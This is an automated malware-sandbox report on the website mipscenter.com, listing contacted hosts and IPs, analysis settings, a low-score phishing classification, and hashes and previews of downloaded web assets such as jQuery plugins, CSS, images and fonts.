                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703551v0s19.xmlfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule703051v3s19.xmlfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_45d0d23ed0cb5c8dceb54a1359eec7b6.jstrue
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120661v0s19.xmlfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120655v0s19.xmlfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120614v0s19.xmlfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/other-Win32-v19.bundlefalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702350v1s19.xmlfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120639v0s19.xmlfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_fb0c7bc7a6d9f663a06090c047a9fb61.jstrue
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule701050v1s19.xmlfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule704200v0s19.xmlfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702200v1s19.xmlfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule704050v0s19.xmlfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700350v1s19.xmlfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        142.250.80.46
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        23.201.191.59
                                                                                                                                                                                                                                        e8843.dsca.akamaiedge.netUnited States
                                                                                                                                                                                                                                        16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                        160.153.0.94
                                                                                                                                                                                                                                        mipscenter.comUnited States
                                                                                                                                                                                                                                        21501GODADDY-AMSDEfalse
                                                                                                                                                                                                                                        142.250.65.163
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.64.118
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        23.48.224.108
                                                                                                                                                                                                                                        e64861.dsca.akamaiedge.netUnited States
                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                        142.250.80.42
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.81.238
                                                                                                                                                                                                                                        youtube-ui.l.google.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        35.71.137.105
                                                                                                                                                                                                                                        a1d4ba62fdc34338f.awsglobalaccelerator.comUnited States
                                                                                                                                                                                                                                        237MERIT-AS-14USfalse
                                                                                                                                                                                                                                        142.251.40.132
                                                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.251.32.106
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.65.238
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        13.33.252.15
                                                                                                                                                                                                                                        cdn.callrail.comUnited States
                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                        142.251.32.98
                                                                                                                                                                                                                                        googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        192.178.155.84
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.65.214
                                                                                                                                                                                                                                        i.ytimg.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.80.106
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.251.111.154
                                                                                                                                                                                                                                        stats.g.doubleclick.netUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.251.111.155
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.176.198
                                                                                                                                                                                                                                        static.doubleclick.netUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        1.1.1.1
                                                                                                                                                                                                                                        unknownAustralia
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        142.250.65.195
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        199.232.89.229
                                                                                                                                                                                                                                        jsdelivr.map.fastly.netUnited States
                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                        142.251.40.238
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        18.206.37.78
                                                                                                                                                                                                                                        services.ohmd.comUnited States
                                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                        192.0.77.2
                                                                                                                                                                                                                                        i0.wp.comUnited States
                                                                                                                                                                                                                                        2635AUTOMATTICUSfalse
                                                                                                                                                                                                                                        142.250.80.33
                                                                                                                                                                                                                                        photos-ugc.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.80.34
                                                                                                                                                                                                                                        td.doubleclick.netUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.64.67
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.251.40.142
                                                                                                                                                                                                                                        play.google.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        23.209.72.207
                                                                                                                                                                                                                                        e40258.g.akamaiedge.netUnited States
                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                        142.250.72.99
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.251.41.8
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        104.17.25.14
                                                                                                                                                                                                                                        cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        192.168.2.17
                                                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                        Analysis ID:1650686
                                                                                                                                                                                                                                        Start date and time:2025-03-27 22:44:25 +01:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                        Sample URL:https://mipscenter.com
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:16
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        Analysis Mode:stream
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal52.phis.win@29/109@140/368
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.65.238, 142.250.65.195, 192.178.155.84, 142.250.65.206, 142.250.80.42, 142.250.72.99
                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fonts.googleapis.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, fonts.gstatic.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        • VT rate limit hit for: https://mipscenter.com
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1653)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1753
                                                                                                                                                                                                                                        Entropy (8bit):4.911690245230083
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:19ED3D99A7A02471AF6D8B23F80C1E80
                                                                                                                                                                                                                                        SHA1:2EC538B6C8C25F32F379F179CCE8F39F38DFEEC4
                                                                                                                                                                                                                                        SHA-256:2DFE35CC6DF5376C2BB574D5B9B166483FBA3E7B4AE001D5E28C996723315BA0
                                                                                                                                                                                                                                        SHA-512:922B95E689736EE96273B7DA11D0515CB72081E3182450F4B3430927427E01EAC69A83E07974EDABF10CE9230EC2BE83E287CEF1C1529B2853EF163CCB60B3BB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_55ef45e593ebdf6ba97abd22330755d5.css
                                                                                                                                                                                                                                        Preview:/*! Flickity v2.2.1.https://flickity.metafizzy.co.---------------------------------------------- */..flickity-enabled{position:relative}.flickity-viewport{overflow:hidden;position:relative;height:100%}.flickity-slider{position:absolute;width:100%;height:100%}.flickity-enabled.is-draggable{-webkit-tap-highlight-color:transparent;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.flickity-enabled.is-draggable .flickity-viewport{cursor:move;cursor:-webkit-grab;cursor:grab}.flickity-enabled.is-draggable .flickity-viewport.is-pointer-down{cursor:-webkit-grabbing;cursor:grabbing}.flickity-button{position:absolute;background:hsla(0,0%,100%,.75);border:none;color:#333}.flickity-button:hover{background:#fff;cursor:pointer}.flickity-button:focus{box-shadow:0 0 0 5px #19f}.flickity-button:active{opacity:.6}.flickity-button:disabled{opacity:.3;cursor:auto;pointer-events:none}.flickity-button-icon{fill:currentColor}.flickity-prev-next-button{top:50%;width:44px;hei
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1737)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):28276
                                                                                                                                                                                                                                        Entropy (8bit):5.332143186185938
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:B8453ED171A9AB7AA0D9B4994A82DC7E
                                                                                                                                                                                                                                        SHA1:0D682A11286DF0359CE2E897FB2E9D0B5D45F52C
                                                                                                                                                                                                                                        SHA-256:8D6C9768999B2E0240F482B560157CC21C3CD5AF5AE5B6CD6E1086DD7A0377A6
                                                                                                                                                                                                                                        SHA-512:F901230BF42FE1B087DBBC5AA5C20AEA47733338E434A845DA9EC88643EF121ECBAE1A093EB675C5DFFF4E500288E3E23FFB791F70DD580C31D95F2301F47E4F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_5b23ded83b6a631b06040ed574e43dd6.js
                                                                                                                                                                                                                                        Preview:;./*! Magnific Popup - v1.1.0 - 2016-02-20.* http://dimsemenov.com/plugins/magnific-popup/.* Copyright (c) 2016 Dmitry Semenov; */.(function(factory){if(typeof define==='function'&&define.amd){define(['jquery'],factory);}else if(typeof exports==='object'){factory(require('jquery'));}else{factory(window.jQuery||window.Zepto);}}(function($){var CLOSE_EVENT='Close',BEFORE_CLOSE_EVENT='BeforeClose',AFTER_CLOSE_EVENT='AfterClose',BEFORE_APPEND_EVENT='BeforeAppend',MARKUP_PARSE_EVENT='MarkupParse',OPEN_EVENT='Open',CHANGE_EVENT='Change',NS='mfp',EVENT_NS='.'+NS,READY_CLASS='mfp-ready',REMOVING_CLASS='mfp-removing',PREVENT_CLOSE_CLASS='mfp-prevent-close';var mfp,MagnificPopup=function(){},_isJQ=!!(window.jQuery),_prevStatus,_window=$(window),_document,_prevContentType,_wrapClasses,_currPopupType;var _mfpOn=function(name,f){mfp.ev.on(NS+name+EVENT_NS,f);},_getEl=function(className,appendTo,html,raw){var el=document.createElement('div');el.className='mfp-'+className;if(html){el.innerHTML=html;}
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (832), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):832
                                                                                                                                                                                                                                        Entropy (8bit):4.815302373336648
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:3D453229A3973286BDC7612119E9AF5A
                                                                                                                                                                                                                                        SHA1:B4EBB5EE6670584CED98A0B18FBB2354542C1382
                                                                                                                                                                                                                                        SHA-256:7D7B0095822F0EB118DB54E3BFC349384296D3FAA6D4B0ED47E1CFEF76D11A3F
                                                                                                                                                                                                                                        SHA-512:F4A3D9334A45B3D9D1AC637AEEA1EB11FA2F1874F0649DF7E898FB830D0681E78387CB458ACE8E450A01AD3A7F3CBFA7B04CA1FFC059F636A5CDBEC126C6C636
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/js/animation-listeners.min.js
                                                                                                                                                                                                                                        Preview:(function(a){a.fn.extend({animateCss:function(c,d){var b=(function(f){var g={animation:"animationend",OAnimation:"oAnimationEnd",MozAnimation:"mozAnimationEnd",WebkitAnimation:"webkitAnimationEnd",};for(var e in g){if(f.style[e]!==undefined){return g[e]}}})(document.createElement("div"));this.addClass("animated "+c).one(b,function(){a(this).removeClass("animated "+c);if(typeof d==="function"){d()}});return this},});a(function(){a(".fa-practis-animate").each(function(b){var c=a(this);var d;if(c.parents("a").length>0){d=c.parents("a")}else{d=c}if(c.attr("data-animateEvent")=="tillMouseOut"){d.hover(function(){c.addClass("animated infinite "+c.attr("data-animation"))},function(){c.removeClass("animated infinite "+c.attr("data-animation"))})}else{d.mouseover(function(){c.animateCss(c.attr("data-animation"))})}})})})(jQuery);
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1624)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1786
                                                                                                                                                                                                                                        Entropy (8bit):4.998104414090436
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:A3AB67C1CDAE8318CF36E68BD0A6E4CA
                                                                                                                                                                                                                                        SHA1:B91B3D6149321188AC060D261B746E08C458B1A6
                                                                                                                                                                                                                                        SHA-256:7CEF6691A692314BC55763F780492250E55CCAEA31A161CA1C791D52FBACE817
                                                                                                                                                                                                                                        SHA-512:717291C69AC0EABE009E7B8531B25A436F0C9F5FE0248C097C428AE9F0729E23216DAA8DABE0D424D8BF5C15C544F883441FCC488FF4DFC438B72A6C04A2A900
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_f92b60460a40c563830b73c3b5f644e0.js
                                                                                                                                                                                                                                        Preview:!function(e){function t(n){if(o[n])return o[n].exports;var r=o[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,t),r.l=!0,r.exports}.var o={};t.m=e,t.c=o,t.d=function(e,o,n){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=0)}([function(e,t,o){"use strict";var n="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r=o(1),u={passive:!0,capture:!1},i=["scroll","wheel","touchstart","touchmove","touchenter","touchend","touchleave","mouseout","mouseleave","mouseup","mousedown","mousemove","mouseenter","mousewheel","mouseover"],s=function(e,t){return void 0!==e?e:-1!==i.indexOf(t)&&u.passive},c=function(e){var t=Obj
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (324)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):4030
                                                                                                                                                                                                                                        Entropy (8bit):5.120555921808537
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:B3F2592A887CAB768139E3F21478833F
                                                                                                                                                                                                                                        SHA1:69BF7C0DE2A93EB386A1CAA02EA193F3E998C47F
                                                                                                                                                                                                                                        SHA-256:65BC0C8977CFE07502AACDCCCF0644A9291387EDD27D8FBBA446F2D80ACE3239
                                                                                                                                                                                                                                        SHA-512:20E49CA8B1CD85E85302B1F430CDC806AEB777A227595F73C9FF2F37326412D2128E2BF815EF6A2C341B29B236D6CE6EE18A7B13A21F450D9C0C4DA5868269E6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_f8baa9b6a9ab8164f24c1ee632ee2a56.js
                                                                                                                                                                                                                                        Preview:/*!. * Generated using the Bootstrap Customizer (https://getbootstrap.com/docs/3.4/customize/). */./*!. * Bootstrap v3.4.1 (https://getbootstrap.com/). * Copyright 2011-2019 Twitter, Inc.. * Licensed under the MIT license. */.if(typeof jQuery==='undefined'){throw new Error('Bootstrap\'s JavaScript requires jQuery')}.+function($){'use strict';var version=$.fn.jquery.split(' ')[0].split('.').if((version[0]<2&&version[1]<9)||(version[0]==1&&version[1]==9&&version[2]<1)||(version[0]>3)){throw new Error('Bootstrap\'s JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4')}}(jQuery);+function($){'use strict';var Affix=function(element,options){this.options=$.extend({},Affix.DEFAULTS,options).var target=this.options.target===Affix.DEFAULTS.target?$(this.options.target):$(document).find(this.options.target).this.$target=target.on('scroll.bs.affix.data-api',$.proxy(this.checkPosition,this)).on('click.bs.affix.data-api',$.proxy(this.checkPositionWithEventLoop,this)).this.$
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 360 x 98, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):15888
                                                                                                                                                                                                                                        Entropy (8bit):7.983619974763312
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:AEE30A5B1E58D79CE477B6ACCD3339B2
                                                                                                                                                                                                                                        SHA1:8A6FFA1F4275DC59A16F79DCF173E7DE3AC990F9
                                                                                                                                                                                                                                        SHA-256:7625187DAC0A66C25B80130480C7C382E05A78BEAD2722B6353494B14ADCDDFF
                                                                                                                                                                                                                                        SHA-512:F6B5E0DD082560C43E4F456711ECCE877B0BFE7A884484B7C6BCFFF6E99CFC9D506F86549B4E7B0CD05727DAF3B4B328BE3E0502D2EF48E038C27E3474D69480
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/uploads/2021/03/new-website-logo-360x98.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR...h...b.....}.I...=.IDATx....K.a....~..U.J=`....C..)<.e..RLP2... .4. A.2LH2.:3...7...."....b.D.V.....QD....]............(..tx..uz..v..(.>..""Z.y..=.UG<=........T_+..l........../..R.8..|.{.t.hk.2....xv.... "....R.%..f....h..}slD.._XP.=..j....*._w...&"Z+9.*3...#u....'......y..cA.?..._..S.N+.@..ni...bF..,..9.+.v...m:.w.....Trys.s..<.P8$.B......7..,.r.v6....8.....t.!....S....x..D(<........qq....,..Y...-.(032...a...J.-..9L.L.{....;.BeT.....I..d.. ..d.@....6....MWNJ..R..)._..&B....4.Yi...8..~...:...AD..2.v5...U....Mi......(.}...g....>I.~.K..m..hB....`...D..,.....Kh\U........i.6.m....b..BEE.......A.A.n. ....M..W.X_..H...Q.....&..I.Lr.=...Krk.d..9..1.Y..7...\..1...p...,.0_.3E..#g.4~..+.~.,.Rf2i*....O.2$.J.3.........;..u.vgIJ..V.#.W......E.|JR;m...5..s..ZK.s.'....".....{~.../C.h....pj.,.EN])0..pFR1..(~..Q...J.E.....".ZT.Z.j...'.....Q.\...*.\t.]p..Z.u$.>[%= 0..n..!@B.E=...z.+.\..}.......r...|..c...1..\.P...3.p..I....6....@|.2.z.v.j.K...&..`
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                        Entropy (8bit):4.142295219190901
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:1FA71744DB23D0F8DF9CCE6719DEFCB7
                                                                                                                                                                                                                                        SHA1:E4BE9B7136697942A036F97CF26EBAF703AD2067
                                                                                                                                                                                                                                        SHA-256:EED0DC1FDB5D97ED188AE16FD5E1024A5BB744AF47340346BE2146300A6C54B9
                                                                                                                                                                                                                                        SHA-512:17FA262901B608368EB4B70910DA67E1F11B9CFB2C9DC81844F55BEE1DB3EC11F704D81AB20F2DDA973378F9C0DF56EAAD8111F34B92E4161A4D194BA902F82F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://static.doubleclick.net/instream/ad_status.js
                                                                                                                                                                                                                                        Preview:window.google_ad_status = 1;.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (492)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):674
                                                                                                                                                                                                                                        Entropy (8bit):5.392700835178395
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:9868AD6D3400CD397EAD9FD89D8A7042
                                                                                                                                                                                                                                        SHA1:A84CFF129A4BDF8DB5B4B202A511AEDB8A63DC0B
                                                                                                                                                                                                                                        SHA-256:AE468E96123064D255B165334A28F9E1E68B05ADBDC39381F3810C2EEF751A9D
                                                                                                                                                                                                                                        SHA-512:A89DB0FE07457EAE56C2826EA0AA72894BC7D69BAE47CDC051527591F5FAD2CEC96E6347CB0DAE915C3A4DEBB31A2194ED17E24DECAF9B5B7CABAF1F74E36011
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_40635054e327b749517fbfc876906d27.js
                                                                                                                                                                                                                                        Preview:/*!.* FitText.js 1.2.*.* Copyright 2011, Dave Rupert http://daverupert.com.* Released under the WTFPL license.* http://sam.zoy.org/wtfpl/.*.* Date: Thu May 05 14:23:00 2011 -0600.*/.(function($){$.fn.fitText=function(kompressor,options){var compressor=kompressor||1,settings=$.extend({'minFontSize':Number.NEGATIVE_INFINITY,'maxFontSize':Number.POSITIVE_INFINITY},options);return this.each(function(){var $this=$(this);var resizer=function(){$this.css('font-size',Math.max(Math.min($this.width()/(compressor*10),parseFloat(settings.maxFontSize)),parseFloat(settings.minFontSize)));};resizer();$(window).on('resize.fittext orientationchange.fittext',resizer);});};})(jQuery);
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 1536x675, components 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):118757
                                                                                                                                                                                                                                        Entropy (8bit):7.98635551626106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:2BB2D4F45FF188ECD89C474BAA6AA295
                                                                                                                                                                                                                                        SHA1:717F99AD99EF0941A6652B7F8F6C0B85D5E23BA0
                                                                                                                                                                                                                                        SHA-256:A358BD98D2F093035F8755FE932A757A9176D746BD3C664BFC43C147ACDE3B93
                                                                                                                                                                                                                                        SHA-512:B1A85DCDC23AC1C1493B3111E0C0D0E79AC8309625A4651417E3CDA766D8870E45F5514C9BCC4F7ABDBAC03B8E873FAA40F6215AD55BB60ED392BB31A423958A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...................................................!........'.."#%%%..),($+!$%$...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."..........6....................................................................G..*.....M@.P%.....H3#.24...3.kB.@....20P.....F..0.f..3I.F....P .i.,$.`.....H0...a..3 ..`... .......@...@... ....".....&...**DFHI.L...T...,..M'......FF.:..l.g..qY`..[.7....y..6.........(W..l.....V..*.rC...<+.....}E.}\3..w.a...%*H.....20"R.....@.@@.`...........#.@.) ...&@..'.TC..X..3A...F..03..aH.J@....@....J........)*`. .J...0......P#`RL.....3H.. 3H. HP#`. ..3Hb..3 ...PH. ...d@. ..4dA......6..@...@.. ...`.........3.4..guW.LUa;={...._`..I....ck.yk=.gH.u..'Mv....:/.B..^.[.U.........4J..-......o.wsx....?.<.H.K.($..F.#....$....2a.$...# .."0."6.2a....# .....(..=.iW..!H3.L.....f`J5.VF.dm. 5.T..(..`........Md$.&....00.f.....#.i4(.1@.3H...(...M.... Q...4.@.m., .a.........0...6d...A...aI.P0 `.M .........H.Z.u....L........;..:R...wa...Lk:..K..I:.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 21796, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):21796
                                                                                                                                                                                                                                        Entropy (8bit):7.988419687240999
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:8074C760FBDD366FC1C33CE702911ABF
                                                                                                                                                                                                                                        SHA1:B68CDEBFB413C4AD60FA131DC29E36DA4B3CE45C
                                                                                                                                                                                                                                        SHA-256:2B14E8397D552F351A4396DEC25EC5DA1348865683100E94C4AB0FAEA4A9A254
                                                                                                                                                                                                                                        SHA-512:3AB42A18AF9E84CF5235E3B62E742EC42EDB5BEE37CF02EC9264B68F455821099F892B5C61A59C84832B3CB94FDB9729459AADFDE4906CCE785BAF92DB1C3DCA
                                                                                                                                                                                                                                        Malicious:false
